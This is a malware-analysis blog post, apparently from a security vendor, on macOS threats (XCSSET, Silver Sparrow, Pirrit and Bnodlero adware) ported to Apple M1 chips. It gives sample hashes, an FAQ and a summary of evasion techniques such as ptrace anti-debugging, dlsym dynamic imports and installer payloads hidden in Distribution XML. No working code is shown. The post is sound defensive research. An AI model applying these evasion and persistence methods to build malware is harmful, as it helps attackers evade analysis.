Malware descriptions

Good old malware for the new Apple Silicon platform

Introduction

A short while ago, Apple released Mac computers with the new chip called Apple M1. The unexpected release was a milestone in the Apple hardware industry. However, as technology evolves, we also observe a growing interest in the newly released platform from malware adversaries. This inevitably leads us to new malware samples compiled for the Apple Silicon platform. In this article, we are going to take a look at threats for Macs with the Apple M1 chip on board. Also, we prepared a short F.A.Q. section at the end of the article for those who want to understand better the security risks of M1 malware. Let’s dive in.

XCSSET malware

Last year, a threat called XCSSET was discovered for the first time. It targets mainly Mac developers using a unique way of distribution: injecting a malicious payload into Xcode IDE projects on the victim’s Mac. This payload will be executed at the time of building project files in Xcode. XCSSET modules have numerous capabilities, such as:

  • Reading and dumping Safari cookies,
  • Injecting malicious JavaScript code into various websites,
  • Stealing user files and information from applications, such as Notes, WeChat, Skype, Telegram, etc.,
  • Encrypting user files.

All these various features, in combination with high stealth and an unusual way of distribution, make XCSSET a dangerous threat for Mac computers.

While exploring the various executable modules of XCSSET, we found out that some of them also contained samples compiled specially for new Apple Silicon chips. For example, a sample with the MD5 hash sum 914e49921c19fffd7443deee6ee161a4 contains two architectures: x86_64 and ARM64.

The first one corresponds to previous-generation, Intel-based Mac computers, but the second one is compiled for ARM64 architecture, which means that it can run on computers with the new Apple M1 chip. According to VirusTotal, this sample was first uploaded on 2021-02-24 21:06:05 and the original research report did not contain this hash or a module named “metald”, the name of the executable file. With this information on hand, we can assume that the XCSSET campaign is probably still ongoing. This leads us to the thought that more and more malware writers are actively recompiling their samples to have an opportunity to run on new Apple Silicon Macs natively.

Silver Sparrow threat

XCSSET is not the only family which has adapted to run natively on Apple Silicon. According to a RedCanary report, a new threat called Silver Sparrow has been identified. This threat introduces a new way for malware writers to abuse the default packaging functionality: instead of placing a malicious payload in preinstall or postinstall scripts, malware writers hid one in the Distribution XML file.

This payload uses JavaScript API to run bash commands in order to download a JSON configuration file.

Downloading of JSON config

And after successfully downloading that configuration file, the sample extracts a URL from the downloadURL field for the next download.

Downloading and executing a payload

Also, an appropriate Launch Agent is created for persistent execution of the malicious sample.

Malware persistence

This JavaScript payload can be executed regardless of chip architecture, but in the package file with the MD5 hash sum fdd6fb2b1dfe07b0e57d4cbfef9c8149, there is a “fat” Mach-O containing two supported architectures (ARM64 and x86_64), as compared to the old package with the MD5 hash sum 30c9bc7d40454e501c358f77449071aa. This means that the malware actors are trying to expand their attack coverage by supporting a wider range of platforms.

Adware threats for the new platform

However, there are not just malware samples that can be launched on Apple Silicon. A known Mac malware researcher Patrick Wardle recently published a post covering Pirrit adware. Though it is an old and well-known adware family, it is still actively updated by their authors and new samples are encountered in the wild quite often.

These updates include:

  • Anti-debug techniques such as using ptrace syscall with a PT_DENY_ATTACH flag,
  • Control flow obfuscation techniques,
  • Dynamic imports with dlsym calls to avoid static analysis,
  • Virtual machine detection anti-analysis.

Control flow obfuscation; dynamic symbols resolving with dlsym

Besides these improvements in regular Intel x86_64 samples, new ARM64 samples were introduced. These are crafted specifically for the Apple Silicon M1 chip, but the consequences of running these are roughly the same: launching Pirrit adware results in pop-ups, banners and various annoying advertisements displayed on the victim’s Mac.

Pirrit is not the only adware family to have begun supporting the Apple Silicon platform recently. For example, we also observed an ARM64 Bnodlero adware sample (MD5 82e02c1ca8dfb4c60ee98dc877ce77c5), which runs a bash downloader script using the system() function.

Bash downloader executed by Bnodlero sample

Frequently Asked Questions

What is so special about M1 threats?

Well, there is not much special about them, frankly speaking. The only thing that distinguishes the new Apple M1 threats from previous ones targeting Intel-based Mac computers is the architecture of the Mac processor for which the executable is compiled. In order to get their applications to run on Apple Silicon, software developers should recompile their code into executables which can run on the M1 chip. The same is true for malware adversaries.

Is Apple M1 chip less secure than Intel ones?

No, it is just a matter of platform support in malware executables.

Are Intel-based Macs affected by M1 threats?

Yes and no. On the one hand, code that is compiled exclusively for the Apple Silicon platform cannot be natively executed on the Intel x86_64 architecture. On the other hand, malicious samples are often delivered in so-called “fat” Mach-O, which usually contains the same code but is compiled for several architectures. This means that running this “fat” executable will result in launching the right malicious code depending on your platform architecture. Pirrit and Bnodlero samples are great examples of this approach.

Can threats for Intel-based Macs run on Apple M1?

Yes, they can. Due to the Rosetta 2 feature, newly released Mac computers with Apple M1 can also run malicious code written exclusively for Intel x86_64 architecture. This backward compatibility will certainly be abused by malware operators until Apple completes the transition to their proprietary chips.

Is there an upward trend in M1 malware?

Yes, there certainly is, and it is absolutely to be expected. As soon as a platform becomes more popular or highly anticipated, developers try to ensure that their software is available for it. Malware developers are no exception.

Conclusion

With the new M1 chip, Apple has certainly pushed its performance and energy saving limits on Mac computers, but malware developers kept an eye on those innovations and quickly adapted their executables to Apple Silicon by porting the code to the ARM64 architecture.

We have observed various attempts to port executables not just among typical adware such as Pirrit or Bnodlero samples, but also among malicious packages, such as the Silver Sparrow threat and XCSSET downloadable malicious modules. This certainly will give a kickstart to other malware adversaries to begin adapting their code for running on Apple M1 chips.

Good old malware for the new Apple Silicon platform

Your email address will not be published. Required fields are marked *

 

Reports

The leap of a Cycldek-related threat actor

The investigation described in this article started with one such file which caught our attention due to the various improvements it brought to this well-known infection vector.

Lazarus targets defense industry with ThreatNeedle

In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns.

Sunburst backdoor – code overlaps with Kazuar

While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Our observations shows that Kazuar was used together with Turla tools during multiple breaches in past years.

Subscribe to our weekly e-mails

The hottest research right in your inbox